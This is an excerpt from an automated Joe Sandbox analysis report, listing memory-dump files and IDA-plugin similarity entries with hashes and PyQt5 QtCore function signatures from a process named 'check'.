                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Entry@Event@@@State@@
                                                                                                                                                                                                                • String ID: BJ8$QSignalMapper$childEvent$childEvent(self, a0: Optional[QChildEvent])
                                                                                                                                                                                                                • API String ID: 1816429982-2413309684
                                                                                                                                                                                                                • Opcode ID: 76dd4620f82af6db9c528afb6a97590f5b20be99424d7a5a856c8fd39caf19ec
                                                                                                                                                                                                                • Instruction ID: fd8c4bccd0bafb4186fc9dfa055972354286cc942d4ae7f0a68102fc540a4349
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76dd4620f82af6db9c528afb6a97590f5b20be99424d7a5a856c8fd39caf19ec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 002130B2A09B46C6EA408B25F44466977B4FB84B80F581132DA8D13774DF7CD559C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?setFragment@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE ref: 00007FFB02F22465
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setFragment@Mode@1@@ParsingString@@Url@@
                                                                                                                                                                                                                • String ID: BJ1|E$QUrl$setFragment$setFragment(self, fragment: Optional[str], mode: QUrl.ParsingMode = QUrl.TolerantMode)
                                                                                                                                                                                                                • API String ID: 3730795057-2171983309
                                                                                                                                                                                                                • Opcode ID: 9d31c67071b15999407c34f1683a59af6157bff99445be802f2ea720041398c9
                                                                                                                                                                                                                • Instruction ID: 5cae3f43dce6656cd6bec8af786c4604cb6e56e2feb3db2d581660d075bced84
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d31c67071b15999407c34f1683a59af6157bff99445be802f2ea720041398c9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B31E2B6B19B4585EB508F25E8887AD33A8FB48B80F564136CA9C53720EF3AD959C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?partsFromDate@QCalendar@@QEBA?AUYearMonthDay@1@VQDate@@@Z.QT5CORE ref: 00007FFB02FDA475
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?partsCalendar@@Date@Date@@@Day@1@FromMonthYearmalloc
                                                                                                                                                                                                                • String ID: BJ1$QCalendar$partsFromDate$partsFromDate(self, date: Union[QDate, datetime.date]) -> QCalendar.YearMonthDay
                                                                                                                                                                                                                • API String ID: 2206087067-2350064250
                                                                                                                                                                                                                • Opcode ID: eefbb9f5a8f5261ef5f8961bb430231e9ff455b34e50c4ca0c96c8c7b2d6b60a
                                                                                                                                                                                                                • Instruction ID: c4f6e2271223f15e198c46dd853c725057ad8b12f6098fd1bcee5dc394172d25
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eefbb9f5a8f5261ef5f8961bb430231e9ff455b34e50c4ca0c96c8c7b2d6b60a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF215AB6A09B8681DB50DF66E888AE933A4FB48B90F594036CE8D53724EF39D548C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?encodeData@QAbstractItemModel@@IEBAXAEBV?$QList@VQModelIndex@@@@AEAVQDataStream@@@Z.QT5CORE ref: 00007FFB02FEC46B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?encodeAbstractDataData@Index@@@@ItemList@ModelModel@@Stream@@@
                                                                                                                                                                                                                • String ID: BJ1J9$QConcatenateTablesProxyModel$encodeData$encodeData(self, indexes: Iterable[QModelIndex], stream: QDataStream)
                                                                                                                                                                                                                • API String ID: 923366031-3339606736
                                                                                                                                                                                                                • Opcode ID: 467f2b7cfb5352c20aca39f8daf3bb99a8152a1d0e41e6f9f345d5a90517bfc0
                                                                                                                                                                                                                • Instruction ID: f6d4d201ca425bd9b99a2924c89aac2a4f9ba9961aba3bb6c3284fdc694dad43
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 467f2b7cfb5352c20aca39f8daf3bb99a8152a1d0e41e6f9f345d5a90517bfc0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 752128BAB09F4684DB409F25E8887AD33B4FB48B80F954036CA9D53720EF39D459C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?adjusted@QRect@@QEBA?AV1@HHHH@Z.QT5CORE ref: 00007FFB02F22368
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?adjusted@Rect@@malloc
                                                                                                                                                                                                                • String ID: Biiii$QRect$adjusted$adjusted(self, xp1: int, yp1: int, xp2: int, yp2: int) -> QRect
                                                                                                                                                                                                                • API String ID: 2347232885-1393849231
                                                                                                                                                                                                                • Opcode ID: 49549c3672521eaee31859c22f919399115480ebb2ee1dddf6e94c128433ab88
                                                                                                                                                                                                                • Instruction ID: ebbf27df77aad73841554b2e070baa72d226aca6870524bf471bdd47e1c4a69e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49549c3672521eaee31859c22f919399115480ebb2ee1dddf6e94c128433ab88
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F217A76B19B4685DB50CF21E888BAD33A4FB48B80F560036CA5C03720DF7ED948CB40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?disconnect@Bool_Connection@FromLongMetaObject@@Object@@@
                                                                                                                                                                                                                • String ID: QObject$disconnect$disconnect(a0: QMetaObject.Connection) -> booldisconnect(self)
                                                                                                                                                                                                                • API String ID: 1472241590-329950113
                                                                                                                                                                                                                • Opcode ID: 0ff0efc96140571ed8d44fe0e2fe999e34cd82e2b695887d9db0b501d79cd998
                                                                                                                                                                                                                • Instruction ID: 7b842656a68ce11be3dba01143b9a2567b6911a3c04a6b9dc42e464fbe3918b8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ff0efc96140571ed8d44fe0e2fe999e34cd82e2b695887d9db0b501d79cd998
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 012181B5A09A46D1DB408B61F8486BAB3A0FF88B94F480032D98C57774EF7CD199C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?postEvent@QStateMachine@@QEAAXPEAVQEvent@@W4EventPriority@1@@Z.QT5CORE ref: 00007FFB02F1A4B9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?postEventEvent@Event@@Machine@@Priority@1@@State
                                                                                                                                                                                                                • String ID: BJ:|E$QStateMachine$postEvent$postEvent(self, event: Optional[QEvent], priority: QStateMachine.EventPriority = QStateMachine.NormalPriority)
                                                                                                                                                                                                                • API String ID: 3918710353-2286234084
                                                                                                                                                                                                                • Opcode ID: 76063faf66d3e51f585427d2d25b282f330138855314aeac2c3d9f37a68dabfd
                                                                                                                                                                                                                • Instruction ID: f3d326eb68f6241cc00ab3c06e540d8f43abc01c3b9a46dd80bb374e469491ef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76063faf66d3e51f585427d2d25b282f330138855314aeac2c3d9f37a68dabfd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7221EAB6B09F4685EB508F25E8887AD33B4FB48B80F954136CA9C53720DF79D555C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setDevice@@ErrorString@String@@@
                                                                                                                                                                                                                • String ID: BJ1$QSaveFile$setErrorString$setErrorString(self, errorString: Optional[str])
                                                                                                                                                                                                                • API String ID: 426545125-1544865589
                                                                                                                                                                                                                • Opcode ID: 100c7ee351a5cc02c06c1d5e6b41be5265e345b429c253d38c9a51cf9244c56d
                                                                                                                                                                                                                • Instruction ID: 6a692272efde6e1eb7ad2a25cb2c2258281d130e9254108bf7f4d00b4ad6860a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 100c7ee351a5cc02c06c1d5e6b41be5265e345b429c253d38c9a51cf9244c56d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C2129BAB09F46C5DB50DF25E888AA933B4FB48B80F954032CA9D53324EF79D558C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?setStringList@QStringListModel@@QEAAXAEBVQStringList@@@Z.QT5CORE ref: 00007FFB02F7E4E0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$?setListList@List@@@Model@@
                                                                                                                                                                                                                • String ID: BJ1$QStringListModel$setStringList$setStringList(self, strings: Iterable[Optional[str]])
                                                                                                                                                                                                                • API String ID: 4250423493-3293126035
                                                                                                                                                                                                                • Opcode ID: 370350694367c55cd24d84cfa314245e73d41e3588e55f9da40326c5cb1a24e3
                                                                                                                                                                                                                • Instruction ID: 7674b2e3763525fa17b3350e8576d757fee1a1aef004cf361445b54a7fab4aa5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 370350694367c55cd24d84cfa314245e73d41e3588e55f9da40326c5cb1a24e3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D02115B6A09F4685DB509F25E888AAD33B4FB48B80FA54032CA9D53324EF79D559C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
